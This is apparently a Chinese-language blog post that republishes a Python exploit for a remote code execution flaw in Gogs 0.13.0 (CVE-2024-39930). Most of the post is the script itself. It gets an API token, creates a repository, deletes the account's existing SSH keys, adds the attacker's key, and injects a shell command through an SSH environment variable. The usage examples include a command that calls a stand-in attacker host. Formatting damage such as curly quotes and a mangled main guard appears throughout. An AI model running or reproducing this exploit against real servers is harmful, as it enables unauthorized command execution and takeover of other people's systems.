Gogs 0.13.0 远程代码执行漏洞利用详解

本文详细介绍了Gogs 0.13.0版本中的远程代码执行漏洞(CVE-2024-39930),包含完整的Python利用代码、API调用流程和SSH参数注入技术实现细节。

漏洞标题: gogs 0.13.0 - 远程代码执行(RCE)

日期: 2025年6月27日

漏洞作者: Ardayfio Samuel Nii Aryee

软件链接: https://github.com/gogs/gogs.git

版本: gogs <=0.13.0

测试环境: Ubuntu

CVE: CVE-2024-39930

===============================

使用示例:

python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub “touch /tmp/pwned”

python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub “curl http://atacker.com” –ssh-port 2222

===============================

import requests import paramiko import base64 import random import string import sys import argparse from urllib.parse import urlparse

API_BASE_URL = ""

def generate_random_string(length=8, charset=None): if charset is None: charset = string.ascii_letters + string.digits return ‘’.join(random.choices(charset, k=length))

def make_headers(token=None, basic_auth=None): headers = {“Content-Type”: “application/json”} if token: headers[“Authorization”] = f"token {token}" elif basic_auth: b64 = base64.b64encode(basic_auth.encode()).decode() headers[“Authorization”] = f"Basic {b64}" return headers

def http_post(path, json=None, headers=None): url = f"{API_BASE_URL}{path}" response = requests.post(url, json=json, headers=headers) response.raise_for_status() return response

def http_get(path, headers=None): url = f"{API_BASE_URL}{path}" response = requests.get(url, headers=headers) response.raise_for_status() return response

def http_delete(path, headers=None): url = f"{API_BASE_URL}{path}" response = requests.delete(url, headers=headers) response.raise_for_status() return response

def obtain_api_token(username, password): auth = f"{username}:{password}" headers = make_headers(basic_auth=auth) data = {“name”: generate_random_string()}

try:
    response = http_post(f"/users/{username}/tokens", json=data, headers=headers)
    token = response.json()['sha1']
    print(f"[+] API Token Acquired: {token}")
    return token
except Exception as e:
    print(f"[!] Failed to obtain API token: {e}")
    sys.exit(1)

def create_repo(token): repo_name = generate_random_string() headers = make_headers(token=token) data = { “name”: repo_name, “description”: “Auto-created repository”, “private”: False }

try:
    response = http_post("/user/repos", json=data, headers=headers)
    full_name = response.json()['full_name']
    print(f"[+] Repository Created: {full_name}")
    return full_name
except Exception as e:
    print(f"[!] Failed to create repository: {e}")
    sys.exit(1)

def delete_existing_ssh_keys(token): headers = make_headers(token=token) try: response = http_get("/user/keys", headers=headers) keys = response.json() for key in keys: key_id = key[‘id’] http_delete(f"/user/keys/{key_id}", headers=headers) print(f"[+] Deleted SSH Key ID: {key_id}") except Exception as e: print(f"[!] Failed to delete existing SSH keys: {e}") sys.exit(1)

def add_ssh_key(public_key_path, token): delete_existing_ssh_keys(token)

try:
    with open(public_key_path, 'r') as f:
        key = f.read()
except Exception as e:
    print(f"[!] Failed to read public key file: {e}")
    sys.exit(1)

headers = make_headers(token=token)
data = {
    "title": generate_random_string(),
    "key": key
}

try:
    response = http_post("/user/keys", json=data, headers=headers)
    print(f"[+] SSH Key Added: {response.status_code}")
except Exception as e:
    print(f"[!] Failed to add SSH key: {e}")
    sys.exit(1)

def exploit(ssh_user, ssh_host, ssh_port, private_key_path, repo_path, command): try: key = paramiko.RSAKey.from_private_key_file(private_key_path) except Exception as e: print(f"[!] Failed to load SSH key: {e}") sys.exit(1)

try:
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(hostname=ssh_host, port=int(ssh_port), username=ssh_user, pkey=key)

    session = client.get_transport().open_session()

    print("[+] Executing command...... ")
    session.set_environment_variable("--split-string", command)
    session.exec_command(f"git-upload-pack {repo_path}")

    stdout = session.makefile('rb', 1024)
    stderr = session.makefile_stderr('rb', 1024)

    print("STDERR:", stderr.read().decode())
    print("STDOUT:", stdout.read().decode())

    session.close()
    client.close()
except Exception as e:
    print(f"[!] Error: {e}")
    sys.exit(1)

def main(): global API_BASE_URL

parser = argparse.ArgumentParser(description="Exploit Gogs SSH argument injection (CVE-2024-39930)")
parser.add_argument("url", help="Gogs application URL (e.g., http://skillforge.lab:3000)")
parser.add_argument("auth", help="Gogs credentials in the format username:password")
parser.add_argument("private_key", help="Path to private SSH key")
parser.add_argument("public_key", help="Path to public SSH key")
parser.add_argument("command", help="Command to execute remotely")
parser.add_argument("--ssh-port", type=int, default=None, help="Optional: custom SSH port to use")
args = parser.parse_args()

parsed_url = urlparse(args.url)
API_BASE_URL = f"{parsed_url.scheme}://{parsed_url.netloc}/api/v1"
ssh_host = parsed_url.hostname
ssh_port = args.ssh_port if args.ssh_port else (parsed_url.port or 22)

try:
    username, password = args.auth.split(":")
except ValueError:
    print("[!] Invalid format for auth argument")
    sys.exit(1)

token = obtain_api_token(username, password)
repo_path = create_repo(token)
add_ssh_key(args.public_key, token)

exploit(
    ssh_user=username,
    ssh_host=ssh_host,
    ssh_port=ssh_port,
    private_key_path=args.private_key,
    repo_path=repo_path,
    command=args.command
)

if name == “main”: main()

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计